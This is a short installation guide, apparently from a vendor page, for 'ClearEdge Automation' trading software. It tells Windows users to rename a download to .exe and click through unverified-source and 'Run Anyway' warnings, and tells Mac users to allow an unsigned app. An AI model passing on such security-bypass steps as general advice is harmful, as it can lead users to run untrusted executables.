Step 3 - Install the Software

To install the Software, do the following:

Go to:

https://clearedge.trading/downloads

For Windows Users

  1. Once the download is complete, locate the file in your Downloads folder.

  2. If the file does not have a .exe extension, rename it to include .exe.

  3. You may see a warning indicating the software is from an unverified source (highlighted in red).

  4. Click the file, select Keep when prompted, and confirm that you trust the source.

  5. If prompted with a security warning, click More Info, then select Run Anyway to proceed with the installation.

  6. Follow the on-screen prompts to complete the installation.

For Mac Users

  1. Open the downloaded file.

  2. Follow the on-screen prompts to install the software.

  3. If the software does not run automatically due to macOS security settings:

    • Go to System Settings > Privacy & Security.

    • Locate the ClearEdge Automation software and click Allow to authorize it, as it is not an App Store application.

  4. If prompted with a security warning, click More Info and select Run Anyway to proceed.
